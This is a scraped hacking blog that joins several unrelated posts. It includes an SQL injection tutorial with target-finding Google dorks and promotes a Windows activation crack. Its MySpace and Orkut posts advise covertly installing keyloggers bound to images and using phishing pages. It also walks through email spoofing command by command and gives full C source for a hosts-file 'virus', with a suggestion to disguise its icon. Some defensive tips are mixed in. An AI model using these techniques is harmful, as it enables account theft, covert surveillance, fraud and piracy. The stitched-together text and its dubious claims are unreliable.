It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do?

1. How to check if the website is vulnerable to SQL Injection?
A: On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.

Display Legal Notice on Startup of your Windows

If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.

1. Go to Start->Run, type regedit and hit ENTER

2. Navigate to the following key in the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

Secure your Wireless network

Wi-Fi connects computers, printers, video camera’s and game consoles into a fast Ethernet network via microwaves.

Following actions should be taken.

* The most important thing is to change the default password of your access point.
* Firmware and the drivers of your wireless access point and wireless adapters should be up to date. They should be updates whenever necessary.
* There should be a combination of high level encryption and decent keys (WPA2/802.11i ) recommended.
* Wireless users should be authenticated with different protocols like 802.1X, RADIUS, EAP (including EAP-PAX, EAP-PSK, EAP-TLS, EAP-TTLS, EAP-FAST, EAP-POTP, EAP-IKEv2, EAP-GPSK, PEAP, and EAP-SIM.
* The above protocols give credentials including certificates, usernames, passwords etc.
* Use Wireless LAN Security Tools for securing the wireless network. This software is specifically designed for securing 802.11 wireless networks.
* Use a proxy for outgoing requests.
* Always check the security of the wireless LAN using recent tools like Airbase, AirCrack-ng etc.
* Make strict system logging on all the devices, do check your wireless log files regularly.

Banned form adsesne, BidVertiser is a good alternate

Protect yourself from fake login pages

I tried adbrite for a few days, and it was serving unrelevant ads and the Cost per Click (cpc ) was very low. recently I stumbled across a site serving BidVertiser ads, one thing that immediatley caught my attention was the ads were very much relevant to the content on that page. You usually see this only with adsense. I immediatley signed up for a bidvertiser account ( You can see the bidvertiser ads at the begining of this post) and placed their code on GeniusHackers. The results are very encouraging Bidvertiser CPC and CTR are comparable with adsesne.

The best things about Bidvertiser are:

* You will get relevant ads on your site.
* You have various ad formats to choose from, you can even have your own custom sizes so that your site look and feel isn’t lost(This feature isn’t available in adsense).
* Their minimum payout is 10 USD and you can have your payment via paypal.You can have your payment immediately. Adsense payment system is very annoying. I dont know why the still stick to that old age methods. My Octobers adsense cheque hasn’t reached me till now, i requested a reissue 6 times but they dint even bother to reply.

You should sign up for bidvertiser if you are banned from adsense, your site has less traffic and your income is low. Continue with adsesne if you have good traffic and you are not violating their terms.

Tuesday, June 9, 2009

Bypassing Vista SP1 Windows Genuine Advantage

The fact that Microsoft has relaxed its antipiracy mechanism built into Windows Vista concomitantly with the release of Service Pack 1 failed to stop hackers from providing a crack for the latest version of Windows Genuine Advantage Validation.

Various reports point out that Genuine Advantage Validation and Notifications versions 1.7.69.1 (1.7.0069.1) and 1.7.69.2 released in March 2008, following the March 18 availability of Windows Vista SP1 through Windows Update and the Microsoft Download Center, have been cracked.

The workaround is designed to be integrated with pirated copies of Windows XP and Windows Vista in order to render useless the WGA Validation mechanism. According to the reports, applying the WGA crack will permit users of counterfeit versions of Windows to access and download items from Windows Update, Microsoft Download Center and Microsoft Update. The pirated operating systems with the cracked WGA will pass all validations on Microsoft’s websites and offer anything from updates to applications that are restricted to users of genuine operating systems only.

With the release of Windows Vista SP1, Microsoft has scrapped the Reduced Functionality Mode kill switch in its latest operating system. Users of pirated Vista, just as those of XP and Windows Server 2008 will only be informed of the fact that their operating system is no longer genuine. However, pirated versions of Windows are automatically blocked from downloading certain free applications as well as all updates except those labeled Critical. The WGA crack is designed to fix that.

“After the activation grace period has been exceeded the next logon will present the user with a message that directs the customer to activate that copy of Windows. That dialog includes a fifteen second delay before it can be dismissed. If they want to skip activation at that time they can wait for the fifteen seconds and choose “Activate Later” .
But the new story is different.That is Vista SP1 has been cracked successfully and it’s possible to bypass the Windows Genuine Advantage to fool the OS to beleive it as genuine.The release of Service Pack 1 for Vista seems to put no combat against piracy.This crack is available for download on this site.

MORE INFORMATION ON THE CRACK(ACTIVATOR)

VistaSP1_1-Click Activator

Unlike other cracks eg: Vista Loader 3.0.0.1(which has some known issues with the dual boot systems) this crack has been designed to work on dual boot systems.
This crack has incorporated an automated installation process which makes it easy to install.You can select from 4 OEM Logos and licenses during the installation process and within a few seconds your copy will be activated.You can see the system activated upon restart.

This crack also features an uninstallation process which most of the cracks lack the same.Using this, it is not necessary to carry out the manual uninstallation process.You can just uninstall the crack with a single click.

PLEASE FOLLOW THESE INSTRUCTIONS BEFORE APPLYING THIS CRACK.

1.YOU MUST HAVE FULL ADMINISTRATOR RIGHTS TO INSTALL THIS CRACK.

2.TURN OFF USER ACCOUNT CONTROL(UAC) BEFORE INSTALLING THIS CRACK.

3.THIS CRACK CURRENTLY HAS BEEN TESTED ONLY ON 32-BIT ULTIMATE EDITION OF WINDOWS VISTA.

4.EASY ONE CLICK ACTIVATOR.

5.YOU CAN ALSO USE THIS CRACK TO UNINSTALL THE ACTIVATOR.
ENJOY!!!

Here is the download link for the crack
DOWNLOAD

Change IP Address

How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.

1. Click on “Start” in the bottom left hand corner of screen.

2. Click on “Run”.

3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”.

5. Type “exit” and leave the prompt.

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”.

You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.

NOTE: All these tricks works only if you have a dynamic IP address.But if you have a static IP address you have no option to change your IP.

10 Tips to Enhance your PC Security

Today almost everyone of us have a PC with an internet connection but how many of us think about it’s security? In fact most of the people are least bothered about their PC’s security.Especially if you have an internet connection safeguarding your PC against network threats is a must.If your PC is not secured then it might be vulnerable to various threats.The threat may be as simple as a virus which corrupts your data or as complex as an identity theft where there are chances of huge loss of money.Did you know that unsecured PCs can be hijacked in minutes ? If you are really concerned about PC security then here are the top 10 security enhancements for your PC.

1. Check Windows Update.Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a good Antivirus software and update it regularly.An Antivirus without updates is of no use.

3. Install a personal firewall. Both SyGate (http://www.sygate.com/) and ZoneAlarm (http://www.zonelabs.com/) offer free versions.

4. Install a good Antispyware.(Antivirus with built-in antispyware is a go0d choice)

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro#l. This will make it much harder for anyone to gain access to your accounts.

6. If you’re using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Be skeptical of things on the Internet. Don’t blindly assume that an email “From:” a particular person is actually from that person since it is possible to send a fake email.

8. Check for Versign SSL (Secure Sockets Layer) Certificate (Or logo) before you make any ecommerce transaction (Credit card transaction) with a website.

9. Never disable the Auto-Protect feature of your Antivirus.If your Antivirus doesn’t have Auto-Protect feature then manually scan the files before you execute them.

10. Never give out your passwords to anyone at any time even if the person claims to be from “support.”

Hack Protect your Orkut Account

Most of the people ask me “How to hack an Orkut account” which I have already discussed in my previous post Hacking Orkut. But here I am giving you a detailed information about how to protect your Orkut accounts. As we all know most of the Google services are still in BETA. So,websites like Orkut, powered by Google is not totally secure!Several people feel proud in hacking other user’s account. You do a foolish thing, and next day your account is hacked. This is very sad indeed, but hackers are adding names to their victims list till now.

There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.

1. Never try to login/access your Orkut account from sites other than Orkut.com.

2. Never click on any links from the sources you don’t trust while accessing your Orkut account. (or while accessing any other Google services like Gmail,Blogger etc.)

3. Delete any links on your scrapbook, no matter if a known or unknown person have sent it.

4. Never disclose your orkut login details with anyone.

5. Never ever use Javascripts on Orkut, no matter whatever it claims to do. Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.

6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a Phishing site.

7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.

8. Always remember to hit Sign out button, when you are done.

Thursday, May 21, 2009

How to Hack a MySpace Account ?

MySpace is one of the most widely used Social Networking website by many teenagers and adults across the globe. If you’re curious to know how to hack a MySpace Account or preventing your MySpace account from being hacked, then this post is for you.
TWO WAYS TO HACK A MYSPACE ACCOUNT



1. If you have physical access to the victim’s computer

If you have physical access to victim’s computer then it’s just a cakewalk to hack myspace account. This can easily be done by just installing a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack a Myspace account.

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program when it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. So once installed, the keyloggers hide themsleves from the Start menu, Add/Remove Programs, Task Manger, Program Files etc. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer. In addition to this it can also give details such as the time and location at which the password was entered. For example if the victim enters his password in the Myspace login page at 2:30 PM, the keylogger will record this and later tell you that the password was entered in the Myspace login page at 2:30 PM. So, using the keylogger we can not only hack the Myspace password but also track all the activities on the computer.

2. If you do not have physical access to the victim’s computer

What will you do if you do not have access to the computer whose Myspace account is to be hacked ? In this case you can hack Myspace using the Keyloggers that support Remote Installation. This is another variation of a simple keylogger software. These keyloggers will have an option where in you can attach it to any legitimate files such as images, programs (exe files), Microsoft Excel files etc. and send it to the victim via email or by any other means. For example you can attach the keylogger to an image and ask your friend to download it. Once he clicks on it, the keylogger will get installed automatically without his knowledge.

Here are some of the best keyloggers that I have used. These also support remote installation.

1. Win-Spy Monitor

2. Realtime Spy

Which Keylogger is the best?

According to me Win-Spy Monitor is the best. This is because, it has the ability to hide itself from most of the antivirus softwares and works completely in stealth mode. Win-Spy Monitor can disable the anti-virus/anti-spywares before they can detect it. Moreover it can be remotely installed without the need to have a physical access to the victim’s computer. With these features it remains on top of the existing keyloggers. In addition to this, it is one of the cheapest keylogger program compared to other keyloggers which offer the same list of features.

I have tested tons of keylogger programs on the internet and Win-Spy Monitor turned out to be the best one. When I tested it on my friend’s comp, it worked like a charm. I was able to monitor his chat logs, webcam etc. and was able to control his PC from my comp. Simply speaking this is a great software and the amount that we pay is nothing in front of the features offered by it. Do you know Keyloggers are the easiest way to hack a Myspace Account. So, if you are looking for the best keylogger then Win-Spy Monitor is your ultimate choice. I promise, you cannot get a better keylogger than this.

OTHER WAYS TO HACK MYSPACE


Phishing

Phishing is the most commonly used method to hack a MySpace account. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. But once the user attempts to login through these pages, his/her login details are stolen away.

Phishing is proved to be the most effective way of hacking passwords and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

I hope this helps. Please pass your comments and opinions…

Monday, May 11, 2009

Send Fake Email - Fake Email Pranks- Spoof your friends

THIS TUTORIAL WILL TELL YOU HOW TO SEND FAKE EMAIL TO ANY EMAIL BOX SUCH AS YAHOO, GMAIL, HOTMAIL AND SO ON… THE ART OF SENDING FAKE EMAIL IS CALLED EMAIL FORGING OR EMAIL SPOOFING.FOR EXAMPLE YOU CAN SEND FAKE EMAIL TO YOUR FRIEND AS BILL GATES .IT’S 100% WORKING.

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain.But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.Also many of the websites offer you to send fake email from their sites where none of them work.So we have to run our own SMTP server on our computer to successfully send a fake email.SMTP server is a simple software program which can be installed on your computer in few seconds.SMTP server allows you to send fake email right from your desktop easily and effectively.Download QK SMTP server HERE.This is the SMTP server i am using in my tutorial.Once you download and install the server on your comp then you are all set to send fake email successfully.This works 100%,so trust me & continue.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1″

4. Set port to “25″

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running).If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:\>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number.SO you are connecting to the SMTP server running on your own computer.This step is very importand to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message.The response of a OK SMTP server is given below.Message within Orange color is only explanation.

220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice.This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP.IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)

NOTE: THE ABOVE METHOD HAS A VERY LOW SUCCESS RATE.
*****END OF EMAIL FORGING*****

Sunday, May 10, 2009

Essential Hacking Tools for every Hacker

Here is a list of all the essential hacking tools that every hacker should possess.Here in this post I will give details of different Hacking/Security tools and utilities along with the download links.I have also divided these tools into their respective categories for ease of understanding.

NETWORK SCANNERS AND TCP/IP UTILITIES

1. IP TOOLS

IP-Tools offers many TCP/IP utilities in one program. This award-winning program can work under Windows 98/ME, Windows NT 4.0, Windows 2000/XP/2003, Windows Vista and is indispensable for anyone who uses the Internet or Intranet.

It includes the following utilities

  • Local Info - examines the local host and shows info about processor, memory, Winsock data, etc.
  • Name Scanner - scans all hostnames within a range of IP addresses
  • Port Scanner - scans network(s) for active TCP based services
  • Ping Scanner - pings a remote hosts over the network
  • Telnet - telnet client
  • HTTP - HTTP client
  • IP-Monitor - shows network traffic in real time & many more

IP TOOLS has almost all the utilities built into it.So there is no need to use seperate tools for every indivisual process of hacking such as Port scanning,Whois scanning,IP monitor etc.It’s like a hacking tool kit which has all the necessary tools for hacking.

Download IP Tools Here


2. NMAP

Nmap is a similar hacking/security tool as IP Tools which offer slightly different set of features.Unlike IP Tools Nmap is a freeware.It is designed to rapidly scan large networks, although it works fine against single hosts.Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available

Download Nmap Here

PASSWORD CRACKERS

1. LC4 (For Windows Password Recovery)

LC4 is the award-winning password auditing and recovery application, L0phtCrack. It provides two critical capabilities to Windows network administrators:

  • LC4 helps administrators secure Windows-authenticated networks through comprehensive auditing of Windows NT and Windows 2000 user account passwords.

  • LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.

Download LC4 Here


2. SAMINSIDE (For Windows Password Recovery)

SAMInside is designated for the recovery of Windows NT/2000/XP/2003/Vista user passwords.

The following are some of the highlighting features of Saminside.

  • The program doesn’t require installation.It can be directly run from CD,Disk or Pendrive.
  • Includes over 10 types of data import and 6 types of password attack
  1. Brute-force attack
  2. Distributed attack
  3. Mask attack
  4. Dictionary attack
  5. Hybrid attack
  6. Pre-calculated tables attack
  • Run’s very fast since the program is completely written in assembler.

As far as my opinion is concerned both LC4 and SAMINSIDE are powerful password crackers for cracking Windows Passwords.However LC4 has slightly upper hand over Saminside.I recommend LC4 for advanced users but Saminside is more suitable for novice users.

You Can Get Saminside From Here


3. MESSENPASS (For Instant Messenger Password Recovery)

Messenpass is a password recovery tool for instant messengers.It can be used to recover the lost passwords of yahoo messenger or windows messenger.It is too easy to use this tool.Just double-click this tool and it reveals the username and passwords that are stored in the system.

Download MessenPass Here

REMOTE ADMINISTRATION TOOLS (RAT)

RADMIN

Radmin (Remote Administrator) is the world famous, award winning secure remote control software and remote access software which enables you to work on a remote computer in real time as if you were using its own keyboard and mouse.

Radmin has the following features.

  • Access and control your home and office computer remotely from anywhere
  • Perform systems administration remotely
  • Provide Help Desk (remote support) functions for remote users
  • Work from home remotely
  • Manage small, medium, and large networks remotely
  • Organize online presentations and conferences
  • Share your desktop
  • Teach and monitor students’ activities remotely

I have used Radmin personally and recommend this software to everyone.It works great!

Download Radmin Here

Most of the above tools are shareware which means that you have to pay for them.But they are really worth for their money.Most of the time freewares offer limited functionality/features than the sharewares and hence I recommend them to my visitors.But still you can get 99% of all the softwares for free (cracked versions) on the internet.I will not discuss about how/where to download the cracked versions of the softwares for obvious reasons.It’s all up to you how you get these softwares.

How to Copy Locked Photos from Orkut ?

Recently Orkut updated it’s security feature and disabled Right-click on photos of friend’s album.So this makes it difficult to copy photos from Orkut.It’s a new security update made by Orkut to prevent people from copying photos from Orkut and misusing it.This may be annoying most of you! Then…

How To Copy Locked Photos From Orkut?

Yes it’s still possible to copy the photos from Orkut.Here’s a step-by-step procedure to copy the photo.

1. Login into your Orkut Account.

2. Goto your friend’s album and open the photo that you need to copy.

3. Once the photo is loaded to it’s full size just place the mouse cursor on the photo.

4. Press the left click button and drag and drop the photo onto the ADDRESS BAR.I think this trick is no longer working.So I have a new trick….

Just DRAG and DROP the PHOTO onto the current/new TAB (If you have IE 7). That’s it . This trick is working now!!

4. Now the photo gets displayed seperately on your browser.

5. You can Right-Click and select the Save As option to save the photo onto your PC.

The browser also displays the direct link to the photo.This link can be used to share the Orkut photos with your friends without the need to login to your Orkut account to access photos.

Please express your opinions through comments.Cheer Up..

Happy Orkut Hacking.

How to Hack Orkut

Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.

First Level - Security-SSL or 128 bit secured connection
Second Level - Google account checks for cookie in the sytem of user
Third Level - Google provides a redirection to the entered User information
Fourth Level - Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to protect your Orkut account being hacked.

Common Ways to Hack Orkut

1. Using Keyloggers is one of the Easiest Way to Hack an Orkut (or any other email) password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an Orkut account.

A keylogger program is widely available on the internet. Some of the best ones are listed below

Win-Spy Monitor

Realtime Spy

2. Phishing Attack is the most popular way of hacking/stealing other’s password. By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

3. Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

4. Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

5. Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it. So be careful, javascripts can even be used to hack Orkut!

6. Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’. This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email ID of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker. Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

If you would like to share something, comment here and I will add up here with a credit to your name.

Creating a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

1. Download the source code along with the the compiled module(virus) Here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.